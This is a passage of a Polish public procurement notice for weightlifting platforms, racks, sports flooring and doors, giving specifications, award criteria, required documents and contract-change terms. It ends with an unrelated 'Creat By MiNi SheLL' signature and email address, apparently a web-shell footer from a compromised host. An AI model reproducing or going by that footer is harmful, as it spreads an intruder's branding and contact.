nierdzewnej. Belka zapewni stabilizację stojaka. Podane materiały zapewnią odpowiednią wytrzymałość stojaków<br/> Stojaki posiadające autoryzację Polskiego Związku Podnoszenia Ciężarów (należy autoryzację dołączyć do oferty)	Zapewnienie najlepszego sprzętu, zgodnego z wymaganiami PZPC<br/> Wymagana pełna regulacja sztangi z pełnym obciążeniem do ustawienia lewo prawo na kółkach poliamidowych. Wymagane parametry stojaków podczas profesjonalnych treningów siłowych<br/> Stojaki posiadające haki bezpieczeństwa z kółkami poliamidowymi w celu regulacji podobnie jak główny profil nośny	Niezbędne kwestie bezpieczeństwa<br/> Wymagana przy stojakach regulacja szerokości na belce stabilizacyjnej – 10 stopni regulacji	Ilość stopni zapewnia komfort regulacji podczas treningów siłowych<br/> Laserowe wycięcie oznaczenia poziomów	Zapewnienie dokładnych, równych poziomów regulacji<br/> Wymiary stojaków:<br/>Min. wysokość: 1000 mm<br/>Max. Wysokość:1763 mm<br/>Długość min.: 700 mm	Wymiary zapewniające odpowiednią wielkość stojaków przystosowaną do wymagań zawodników wysokiego wyczynu tj. kadry narodowej PZPC i klubów ciężarowych trenujących na terenie Ośrodka<br/>2	Montaż	szt.	13	Montaż 12 podestów w otworach przygotowanych przez Zamawiającego + 1 dodatkowego pomostu na nawierzchnię podłogi sportowej. Poprawa bezpieczeństwa, zapewnienie lepszych warunków do treningu dla kadr narodowych<br/>3	Gwarancja	min. 24 miesiące	Gwarancja zapewniające, długotrwałą bezawaryjną pracę sprzętu<br/>4	Autoryzacja	Dokument<br/>potwierdzający	1	Przedstawienie aktualnej autoryzacji PZPC na ofertowany sprzęt: podesty + stojaki.<br/>Autoryzację należy przedstawić z ofertą. Zapewnienie sprzętu najwyższej jakości, zgodnego z wymaganiami PZPC </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37442000-8 - Ciężarki i sprzęt do ćwiczeń na wytrzymałość</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> DLA CZĘŚCI 1 – na etapie złożenia oferty:<br/>1.	Gwarancja producenta podłogi sportowej określająca długość okresu gwarancji oraz warunki gwarancji<br/>•	wymagany minimalny okres gwarancji 12 miesięcy,<br/>2.	Karta techniczna potwierdzająca właściwości techniczne podłogi sportowej tj. <br/>•	Grubość podłogi<br/>•	Gęstość<br/>•	Wymagany spód w kształcie fali<br/>•	Skład okładziny składającej się z gumowego granulatu SBR<br/>•	Zawartość dodatkowa składu okładziny – 15% EPDM (ral 7035)<br/>•	Sposób cięcia – puzzle cięte wodą<br/>•	Odporność na poślizg ≥90<br/>•	Ścieralność ≤ 250<br/><br/>3.	Certyfikat CFL-S1 dla podłogi sportowej,<br/>•	Potwierdzający klasę trudnozapalności podłogi na poziomie CFL oraz emisji dymu na poziomie s1<br/>4.	GPSR – karta bezpiecznego użytkowania produktu dla podłogi sportowej,<br/>•	Potwierdzająca zgodność produktu z unijnym Rozporządzeniem ws. Ogólnego bezpieczeństwa produktów dostępnych na rynku unijnym.<br/>5.	Gwarancja producenta drzwi określająca długość okresu gwarancji oraz warunki gwarancji,<br/>•	wymagany minimalny okres gwarancji 12 miesięcy<br/>6.	Karta techniczna potwierdzająca właściwości techniczne drzwi,<br/>•	Ogólna charakterystyka drzwi<br/>- Wypełnienie skrzydła<br/>- System uszczelnień<br/>- Wyposażenie – rodzaj zamka<br/><br/>DLA CZĘŚĆI 2 – na etapie złożenia oferty:<br/>1.	Aktualna na dzień złożenia oferty, autoryzacja PZPC wystawiona dla Wykonawcy potwierdzająca że sprzedawane przez niego pomosty ciężarowe oraz stojaki spełniają wymagania techniczne IWF (Międzynarodowa Federacja Podnoszenia Ciężarów) i są zalecane do treningu wysokiego wyczynu w podnoszeniu ciężarów dla kadr narodowych,<br/>2.	Gwarancja producenta podestów ciężarowych i stojaków określająca długość okresu gwarancji oraz warunki gwarancji, wystawiona imiennie na Zamawiającego z podaniem nazwy obiektu, <br/>•	wymagany minimalny okres gwarancji 24 miesiące,<br/><br/>3.	Karta techniczna potwierdzająca właściwości techniczne podestów i stojaków:<br/>Pomost:<br/>•	Marka, model<br/>•	Autoryzacja PZPC<br/>•	Długość, szerokość, wysokość<br/>•	Rodzaj wycięcia<br/>•	Profile<br/>•	Waga<br/>•	Kolor<br/>Stojaki:<br/>•	Marka, model<br/>•	Długość, szerokość, wysokość<br/>•	Maksymalna wysokość<br/>•	Minimalna wysokość<br/>•	Maksymalne obciążenie<br/>•	Waga<br/>•	Kolor <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> DLA CZĘŚCI 1 – na etapie złożenia oferty:<br/>1.	Gwarancja producenta podłogi sportowej określająca długość okresu gwarancji oraz warunki gwarancji<br/>•	wymagany minimalny okres gwarancji 12 miesięcy,<br/>2.	Karta techniczna potwierdzająca właściwości techniczne podłogi sportowej tj. <br/>•	Grubość podłogi<br/>•	Gęstość<br/>•	Wymagany spód w kształcie fali<br/>•	Skład okładziny składającej się z gumowego granulatu SBR<br/>•	Zawartość dodatkowa składu okładziny – 15% EPDM (ral 7035)<br/>•	Sposób cięcia – puzzle cięte wodą<br/>•	Odporność na poślizg ≥90<br/>•	Ścieralność ≤ 250<br/><br/>3.	Certyfikat CFL-S1 dla podłogi sportowej,<br/>•	Potwierdzający klasę trudnozapalności podłogi na poziomie CFL oraz emisji dymu na poziomie s1<br/>4.	GPSR – karta bezpiecznego użytkowania produktu dla podłogi sportowej,<br/>•	Potwierdzająca zgodność produktu z unijnym Rozporządzeniem ws. Ogólnego bezpieczeństwa produktów dostępnych na rynku unijnym.<br/>5.	Gwarancja producenta drzwi określająca długość okresu gwarancji oraz warunki gwarancji,<br/>•	wymagany minimalny okres gwarancji 12 miesięcy<br/>6.	Karta techniczna potwierdzająca właściwości techniczne drzwi,<br/>•	Ogólna charakterystyka drzwi<br/>- Wypełnienie skrzydła<br/>- System uszczelnień<br/>- Wyposażenie – rodzaj zamka<br/><br/>DLA CZĘŚĆI 2 – na etapie złożenia oferty:<br/>1.	Aktualna na dzień złożenia oferty, autoryzacja PZPC wystawiona dla Wykonawcy potwierdzająca że sprzedawane przez niego pomosty ciężarowe oraz stojaki spełniają wymagania techniczne IWF (Międzynarodowa Federacja Podnoszenia Ciężarów) i są zalecane do treningu wysokiego wyczynu w podnoszeniu ciężarów dla kadr narodowych,<br/>2.	Gwarancja producenta podestów ciężarowych i stojaków określająca długość okresu gwarancji oraz warunki gwarancji, wystawiona imiennie na Zamawiającego z podaniem nazwy obiektu, <br/>•	wymagany minimalny okres gwarancji 24 miesiące,<br/><br/>3.	Karta techniczna potwierdzająca właściwości techniczne podestów i stojaków:<br/>Pomost:<br/>•	Marka, model<br/>•	Autoryzacja PZPC<br/>•	Długość, szerokość, wysokość<br/>•	Rodzaj wycięcia<br/>•	Profile<br/>•	Waga<br/>•	Kolor<br/>Stojaki:<br/>•	Marka, model<br/>•	Długość, szerokość, wysokość<br/>•	Maksymalna wysokość<br/>•	Minimalna wysokość<br/>•	Maksymalne obciążenie<br/>•	Waga<br/>•	Kolor <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne środki dowodowe (nie wynikające z ustawy Prawo zamówień publicznych) – Zamawiający przed podpisaniem umowy wzywa wykonawcę, którego oferta została wybrana jako najkorzystniejsza, do złożenia w wyznaczonym terminie, aktualnego na dzień złożenia, oświadczenia na potwierdzenie braku podstaw wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie, o którym mowa w art. 125 ust. 1 PZP oraz oświadczenie na potwierdzenie braku podstaw wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego składa każdy z wykonawców wspólnie ubiegających się o zamówienie<br/>Wskazanie podziału realizacji zamówienia pomiędzy wykonawców wspólnie ubiegających się o udzielenie zamówienia - w przypadku wykonawców występujących wspólnie (w przypadku, o którym mowa w art. 117 ust. 3 PZP) wykonawcy dołączają do oferty oświadczenie z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Część I<br/>1.	Wszelkie zmiany treści niniejszej umowy wymagają formy pisemnej (aneksu) pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwość wprowadzenia zmian do niniejszej umowy polegających na:<br/>1)	zmianie terminów wykonania przedmiotu niniejszej umowy;<br/>2)	zmianie zakresu przedmiotu niniejszej umowy;<br/>3)	wydłużeniu okresu gwarancji lub rękojmi o dowolny okres;<br/>4)	zmiana wynagrodzenia Wykonawcy na warunkach, o których mowa w ust.4.<br/>3.	Zmiana terminu wykonania przedmiotu umowy w zakresie wykonania robót budowlanych będzie możliwa, jeżeli: <br/>1)	wystąpi konieczność wykonania zamówienia dodatkowego, którego nie można było przewidzieć na etapie ogłoszenia o zamówieniu oraz które będzie miało wpływ na przedłużenie terminu wykonania przedmiotu niniejszej umowy;<br/>2)	wystąpi konieczność wykonania robót zamiennych, których nie można było przewidzieć na etapie ogłoszenia o zamówieniu (o ile będzie wymagana zgodnie z obowiązującym prawem) oraz które będą miały wpływ na przedłużenie terminu wykonania przedmiotu niniejszej umowy;<br/>3)	w toku wykonywania przedmiotu umowy wystąpią przeszkody o obiektywnym charakterze, w tym klęski żywiołowe, warunki atmosferyczne lub kolizje z infrastrukturą techniczną, której występowania nie ujawniono ze względów technologicznych uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób, sprawdzeń i dokonywanie odbiorów – pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły zostać zrealizowane.<br/>4)	nastąpi nie przewidziana przerwa w pracy z winy Zamawiającego wynikająca z pracy na czynnym obiekcie, potwierdzona w formie pisemnej. <br/>4.	Zmiana wynagrodzenia umownego będzie możliwa w następujących przypadkach:<br/>1)	wystąpi konieczność zrealizowania przedmiotu niniejszej umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;<br/>2)	wystąpi konieczność zastosowania rozwiązania zamiennego, którego nie można była przewidzieć na etapie zamieszczenia ogłoszenia o zamówieniu;<br/>3)	nastąpi zmiana sposobu wykonania przedmiotu niniejszej umowy, konieczność wykonania prac dodatkowych, których nie można było przewidzieć na etapie ogłoszenia o zamówieniu. W przypadku robót zaniechanych wycena prac zostanie wykonana w oparciu o kosztorys nakładczy. W przypadku robót dodatkowych wycena nastąpi poprzez sporządzenie kosztorysu metodą szczegółową, przy zastosowaniu ceny z kosztorysu nakładczego Wykonawcy, a w przypadku braku tych odnośników na podstawie nośników cenotwórczych wskazanych w dostępnych publikacjach na rynku, np. Sekocenbud, Orgbud, Wacetob aktualnego na dzień sporządzenia kosztorysu (wybór publikacji przez Wykonawcę wymaga akceptacji Zamawiającego):<br/>a)	stawka roboczogodziny „R” — średnia dla woj. pomorskiego,<br/>b)	koszty pośrednie „KP” (R+S) — średnie dla woj. Pomorskiego,<br/>c)	zysk kalkulacyjny „Z” (R+S+Kp) — średnie dla woj. Pomorskiego,<br/>d)	ceny jednostkowe sprzętu i materiałów (łącznie z kosztami zakupu) będą przyjmowane według średnich cen rynkowych, a w przypadku ich braku ceny materiałów i sprzętu zostaną przyjęte na podstawie ogólnie dostępnych katalogów, w tym również cen dostawców na stronach internetowych, ofert handlowych itp.,<br/>e)	nakłady rzeczowe — w oparciu o Katalogi Nakładów Rzeczowych KNR. W przypadku robót dla których brak nakładów w KNR lub te na, będzie zastosowana wycena indywidualna Wykonawcy, zatwierdzana przez Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-03 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-03 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. zapisów odnośnie zmian umowy<br/>5.	Zmiana zakresu przedmiotu niniejszej umowy będzie możliwa w następujących przypadkach:<br/>1)	wystąpi konieczność uwzględnienia wpływu innych przedsięwzięć, działań powiązanych z przedmiotem niniejszej umowy;<br/>2)	nastąpi zmiana stanu prawnego lub powszechnie obowiązujących przepisów prawa, mająca wpływ na wykonanie przedmiotu niniejszej Umowy.<br/>6.	Zmiana zostanie wprowadzona na uzasadniony wniosek Wykonawcy lub Zamawiającego, aneksem do niniejszej umowy. W przypadku, gdy Wykonawca wystąpi z inicjatywą zmiany albo rezygnacji z Podwykonawcy, na którego zasoby Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca obowiązany będzie wykazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>7.	Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca. Wykonawca wystąpi do Zamawiającego, składając pisemny wniosek, zawierający w szczególności:<br/>1)	opis propozycji zmiany;<br/>2)	uzasadnienie zmiany;<br/>3)	opis wpływu zmiany na termin wykonania umowy.<br/>8.	Wszystkie okoliczności wymienione w niniejszym paragrafie stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Wykonawca, w sytuacji braku zgody na podpisanie aneksu w sprawie zmiany wynagrodzenia nie jest uprawniony do wstrzymania prac lub odmowy ich wykonania.<br/>9.	Zmiany Umowy są dopuszczalne w granicach art. 455 Ustawy Prawo zamówień publicznych.<br/>10.	W przypadku okoliczności wymienionych w art. 456 ust. I pkt I ustawy Prawo zamówień publicznych Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o wskazanych w tym przepisie okolicznościach.<br/>- pozostałe zapisy w projektowanych postanowieniach umowy - załącznik nr 1a do SWZ<br/>Część nr II<br/>ZMIANA UMOWY<br/>1.	Wykonawca może wystąpić z wnioskiem o przedłużenie terminu wykonania umowy, jeżeli opóźnienie było następstwem:<br/>1)	siły wyższej skutkującej wstrzymaniem produkcji sprzętu niezbędnego do jego wytworzenia, lub;<br/>2)	siły wyższej uniemożliwiającej spedycję lub bezpieczną spedycje sprzętu niezbędnego do jego wytworzenia.<br/>2.	Wykonawca zobowiązany jest niezwłocznie, najszybciej jak będzie to możliwe, powiadomić Zamawiającego o wystąpieniu którejkolwiek z przesłanek, o której mowa w ust. 1, uzasadniających konieczność przedłużenia terminu wykonania umowy. Przesłanka musi być należycie wykazana i udokumentowana. Dokumenty lub inne dowody potwierdzające istnienie przesłanki uzasadniającej konieczność przedłużenia terminu wykonania umowy, w tym potwierdzające przyczyny opóźnienia, Wykonawca załącza do wniosku. Zamawiający może żądać przedstawienia dodatkowych dokumentów, wyjaśnień lub dowodów, w tym oświadczeń potwierdzających wpływ okoliczności, na które Wykonawca powołuje się wnioskując o zmianę terminu wykonania umowy.<br/>3.	W przypadku uznania przez Zamawiającego istnienia okoliczności uzasadniających zmianę terminu wykonania umowy, jego przedłużenie nastąpi o odpowiedni okres, proporcjonalny do czasu opóźnienia.<br/>4.	Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy również po jego upływie z przyczyn wskazanych w ust. 1.<br/>5.	Zamawiający dopuszcza możliwość zmiany zaoferowanego modelu sprzętu lub jego podzespołu w sytuacji, gdy nastąpi wycofanie danego modelu sprzętu lub podzespołu z produkcji przez producenta albo zaoferowany sprzęt nie będzie dostępny w oficjalnych kanałach dystrybucji, a dostępny będzie sprzęt o parametrach nie gorszych niż wynikające z umowy, pod warunkiem, że cena nie będzie wyższa niż wskazana w ofercie. Wycofanie modelu sprzętu objętego przedmiotem umowy produkcji przez producenta albo niedostępność sprzętu w oficjalnych kanałach dystrybucji Wykonawca musi pisemnie udokumentować.<br/>6.	Zmiana umowy wymaga formy pisemnej

Creat By MiNi SheLL
Email: jattceo@gmail.com